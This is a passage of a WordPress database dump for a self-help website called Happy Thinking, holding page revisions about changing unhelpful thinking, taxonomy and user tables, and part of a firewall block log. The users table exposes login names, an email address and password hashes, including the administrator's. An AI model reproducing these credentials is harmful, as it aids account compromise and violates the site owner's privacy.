{"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Control your mind', '', 'inherit', 'closed', 'closed', '', '2110-revision-v1', '', '', '2023-12-30 17:30:23', '2023-12-30 17:30:23', '', 2110, 'https://www.happythinking.com/?p=2111', 0, 'revision', '', 0),
(2120, 1, '2024-01-12 14:55:55', '2024-01-12 14:55:55', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This can be done using certain â€œmental toolsâ€, somewhat like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal! Instead, the mental tools that I will share with you are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better notice when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking patterns when it happens in your mind. Other tools will help you to change unhelpful thinking patterns into helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. Therefore please give time for the tools to work. Do not expect instant cures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2024-01-12 14:55:55', '2024-01-12 14:55:55', '', 1641, 'https://www.happythinking.com/?p=2120', 0, 'revision', '', 0),
(2114, 1, '2024-01-10 14:09:42', '2024-01-10 14:09:42', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. According to psychologists, over time, oneâ€™s mind may develop certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such unhelpful ways of thinking are very common and one may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various simple methods that you can use to deal with unhelpful thinking. Such methods will be very practical so that you will be able to use them in your daily life. As you change unhelpful ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, applying methods to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2024-01-10 14:09:42', '2024-01-10 14:09:42', '', 88, 'https://www.happythinking.com/?p=2114', 0, 'revision', '', 0),
(2124, 1, '2024-01-12 22:26:10', '2024-01-12 22:26:10', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. According to psychologists, over time, oneâ€™s mind may develop certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such unhelpful ways of thinking are very common and one may not even realise that one is thinking in such ways.  To achieve happiness in one''s life, it is important to recognise and change unhelpful ways of thinking.  The concept of Happy Thinking can help you and it''s about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {"ordered":true} -->\n<ol><!-- wp:list-item -->\n<li>Recognising unhelpful ways of thinking</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Changing unhelpful thinking</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Learning from wisdom about happiness</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In this free website, I will describe common types of unhelpful thinking that people do. This will help you to recognise when you think in such ways. I will also share with you practical ways that you can deal with unhelpful ways of thinking. Additionally, I will sprinkle bits of wisdom about happiness that I have collected from various sources. This will help you to see the world in a more realistic way. These ingredients together make up the concept of Happy Thinking, which can help you become happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on Happy Thinking is truly free. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2024-01-12 22:26:10', '2024-01-12 22:26:10', '', 88, 'https://www.happythinking.com/?p=2124', 0, 'revision', '', 0),
(2122, 1, '2024-01-12 21:51:28', '2024-01-12 21:51:28', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. According to psychologists, over time, oneâ€™s mind may develop certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such unhelpful ways of thinking are very common and one may not even realise that one is thinking in such ways.  To achieve happiness in one''s life, it is important to recognise and change unhelpful ways of thinking. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this free website, I will describe the concept of Happy Thinking, which is about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {"ordered":true} -->\n<ol><!-- wp:list-item -->\n<li>Recognising unhelpful ways of thinking: <!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>To help you with this, I will describe to you the common types of unhelpful thinking that people do.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Changing unhelpful thinking:<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>To help you with this, I will give you practical methods that you can use in your day-to-day life to deal with unhelpful thinking that you may do.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Learning from wisdom about happiness:<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>I will share with you various bits of wisdom about happiness taken from various sources. Such wisdom can help you to see the world in a more accepting and positive way.Â </li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>As you change unhelpful ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on Happy Thinking is truly free. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2024-01-12 21:51:28', '2024-01-12 21:51:28', '', 88, 'https://www.happythinking.com/?p=2122', 0, 'revision', '', 0),
(2134, 1, '2024-01-28 16:19:34', '2024-01-28 16:19:34', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œnegativeâ€ ways of thinking are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change negative ways of thinking when it happens to you. On this free website, I will describe to you the common types of negative thinking that people do. This will help you to recognise negative thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with negative thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change negative ways of thinking you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising negative thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'How to be happy explained', '', 'inherit', 'closed', 'closed', '', '2110-revision-v1', '', '', '2024-01-28 16:19:34', '2024-01-28 16:19:34', '', 2110, 'https://www.happythinking.com/?p=2134', 0, 'revision', '', 0);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_termmeta`
--

CREATE TABLE `wpou_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_terms`
--

CREATE TABLE `wpou_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_terms`
--

INSERT INTO `wpou_terms` VALUES
(1, 'Uncategorized', 'uncategorized', 0),
(2, 'astra-child', 'astra-child', 0),
(3, 'Main top menu', 'main-top-menu', 0);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_term_relationships`
--

CREATE TABLE `wpou_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_term_relationships`
--

INSERT INTO `wpou_term_relationships` VALUES
(1496, 3, 0),
(1681, 3, 0),
(1458, 2, 0),
(1688, 3, 0),
(1686, 3, 0),
(1500, 3, 0),
(1682, 3, 0),
(1687, 3, 0),
(1690, 3, 0),
(1684, 3, 0),
(1676, 3, 0),
(1507, 3, 0),
(1508, 3, 0),
(1509, 3, 0),
(1677, 3, 0),
(1685, 3, 0),
(1683, 3, 0),
(1675, 3, 0),
(1680, 3, 0),
(1678, 3, 0);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_term_taxonomy`
--

CREATE TABLE `wpou_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_term_taxonomy`
--

INSERT INTO `wpou_term_taxonomy` VALUES
(1, 1, 'category', '', 0, 0),
(2, 2, 'wp_theme', '', 0, 1),
(3, 3, 'nav_menu', '', 0, 19);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_usermeta`
--

CREATE TABLE `wpou_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_usermeta`
--

INSERT INTO `wpou_usermeta` VALUES
(1, 1, 'nickname', 'mkhrimas'),
(2, 1, 'first_name', ''),
(3, 1, 'last_name', ''),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'syntax_highlighting', 'true'),
(7, 1, 'comment_shortcuts', 'false'),
(8, 1, 'admin_color', 'fresh'),
(9, 1, 'use_ssl', '0'),
(10, 1, 'show_admin_bar_front', 'true'),
(11, 1, 'locale', ''),
(12, 1, 'wpou_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(13, 1, 'wpou_user_level', '10'),
(14, 1, 'dismissed_wp_pointers', ''),
(15, 1, 'show_welcome_panel', '0'),
(17, 1, 'wpou_dashboard_quick_press_last_post_id', '2136'),
(18, 1, 'community-events-location', 'a:1:{s:2:"ip";s:12:"151.227.71.0";}'),
(21, 1, 'astra-sites-on-active', 'notice-dismissed'),
(22, 1, 'wfls-last-login', '1712002165'),
(23, 2, 'nickname', 'muffsyn7ds'),
(24, 2, 'first_name', ''),
(25, 2, 'last_name', ''),
(26, 2, 'description', ''),
(27, 2, 'rich_editing', 'true'),
(28, 2, 'syntax_highlighting', 'true'),
(29, 2, 'comment_shortcuts', 'false'),
(30, 2, 'admin_color', 'fresh'),
(31, 2, 'use_ssl', '0'),
(32, 2, 'show_admin_bar_front', 'true'),
(33, 2, 'locale', ''),
(34, 2, 'wpou_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(35, 2, 'wpou_user_level', '0'),
(36, 2, '_yoast_wpseo_profile_updated', '1681121112'),
(37, 2, 'dismissed_wp_pointers', ''),
(39, 1, '_yoast_wpseo_profile_updated', '1681121648'),
(41, 1, 'wpou_media_library_mode', 'list'),
(43, 1, 'nav_menu_recently_edited', '3'),
(44, 1, 'managenav-menuscolumnshidden', 'a:5:{i:0;s:11:"link-target";i:1;s:11:"css-classes";i:2;s:3:"xfn";i:3;s:11:"description";i:4;s:15:"title-attribute";}'),
(45, 1, 'metaboxhidden_nav-menus', 'a:2:{i:0;s:12:"add-post_tag";i:1;s:15:"add-post_format";}'),
(46, 1, 'wpou_persisted_preferences', 'a:3:{s:14:"core/edit-post";a:3:{s:26:"isComplementaryAreaVisible";b:0;s:12:"welcomeGuide";b:0;s:10:"openPanels";a:4:{i:0;s:11:"post-status";i:1;s:24:"yoast-seo/document-panel";i:2;s:15:"page-attributes";i:3;s:16:"discussion-panel";}}s:9:"_modified";s:24:"2024-01-12T21:37:50.888Z";s:4:"core";a:1:{s:34:"isInspectorControlsTabsHintVisible";b:0;}}'),
(47, 1, 'wpou_user-settings', 'libraryContent=browse'),
(48, 1, 'wpou_user-settings-time', '1689796769'),
(53, 1, 'closedpostboxes_page', 'a:0:{}'),
(54, 1, 'metaboxhidden_page', 'a:0:{}'),
(99, 1, 'wpou_yoast_notifications', 'a:1:{i:0;a:2:{s:7:"message";s:296:"<p>Because of a change in your home URL setting, some of your SEO data needs to be reprocessed.</p><p>We estimate this will take less than a minute.</p><a class="button" href="https://www.happythinking.com/wp-admin/admin.php?page=wpseo_tools&start-indexation=true">Start SEO data optimization</a>";s:7:"options";a:10:{s:4:"type";s:7:"warning";s:2:"id";s:13:"wpseo-reindex";s:7:"user_id";i:1;s:5:"nonce";N;s:8:"priority";d:0.8;s:9:"data_json";a:0:{}s:13:"dismissal_key";N;s:12:"capabilities";s:20:"wpseo_manage_options";s:16:"capability_check";s:3:"all";s:14:"yoast_branding";b:0;}}}'),
(113, 1, 'wpou_wpsc_dismissed_boost_banner', '1');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_users`
--

CREATE TABLE `wpou_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_users`
--

INSERT INTO `wpou_users` VALUES
(1, 'mkhrimas', '$P$BW8MxjjovgR9fJ6eO0iOMVNG0qlJxb.', 'mkhrimas', 'web21@freshgasflow.com', 'https://www.happythinking.com', '2023-04-10 07:36:55', '', 0, 'mkhrimas'),
(2, 'muffsyn7ds', '$P$BN/n6Dt2NOaVnIDzammepYWAIIrlrV.', 'muffsyn7ds', 'web21@freshgasflow.com', '', '2023-04-10 10:05:12', '', 0, 'muffsyn7ds');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfblockediplog`
--

CREATE TABLE `wpou_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfblockediplog`
--

INSERT INTO `wpou_wfblockediplog` VALUES
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 'SG', 7, 19813, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 'BG', 1, 19805, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 'DE', 8, 19805, 'waf'),
